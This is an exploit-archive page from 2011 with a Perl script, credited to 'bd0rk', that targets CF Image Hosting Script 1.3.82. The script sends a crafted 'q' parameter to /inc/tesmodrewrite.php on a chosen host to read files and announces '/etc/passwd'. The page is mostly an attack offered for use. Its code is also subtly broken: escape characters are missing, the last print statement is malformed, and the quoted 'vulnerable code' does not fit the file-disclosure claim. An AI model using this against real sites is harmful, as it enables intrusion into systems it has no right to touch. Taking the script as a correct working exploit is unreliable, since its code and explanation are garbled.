CF Image Hosting Script 1.3.82 File Disclosure

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CF Image Hosting Script 1.3.82 File Disclosure
# Published : 2011-10-04
# Author :
# Previous Title : Joomla Component Time Returns (com_timereturns) SQL Injection
# Next Title : Feed on Feeds <= 0.5 Remote PHP Code Injection Exploit

#!/usr/bin/perl

#CF Image Hosting Script 1.3.82 File Disclosure Exploit
#Bugfounder and Exploitcoder: bd0rk
#Contact: www.sohcrew.school-of-hack.net
#eMail: bd0rk[at]hackermail.com
#Affected-Software: CF Image Hosting Script 1.3.82
#Vendor: http://www.phpkode.com
#Download: http://phpkode.com/download/p/CF_Image_Hosting_v1.3.zip

#Vulnerable Code in /inc/tesmodrewrite.php line 28
#echo "Current URL: " . $_GET['q'];

#Tested on Ubuntu-Linux

use LWP::Simple;
use LWP::UserAgent;

sub help()
{
print "Sploit: perl $0 [targethost] /dir/n";
}

print "nCF Image Hosting Script 1.3.82 File Disclosure Exploitn";
print " By bd0rk bd0rk[at]hackermail.comn";

($inc, $targethost, $dir, $file,) = @ARGV;

$inc="/inc/";
$file="tesmodrewrite.php?q=[APossibleFile]";
my $url = "http://".$targethost.$dir.$inc.$file;

my $useragent = LWP::UserAgent->new();
my $req = $useragent->get($url,":content_file"=>"[APossibleFile]");

if ($req->is_success)

{

print "$url <= H3h3!nn";
print "etc/passwdn";

exit();
}
else
{
print "Sploit $url Mhhh!n[!]".$req->status_line.n";

exit();
}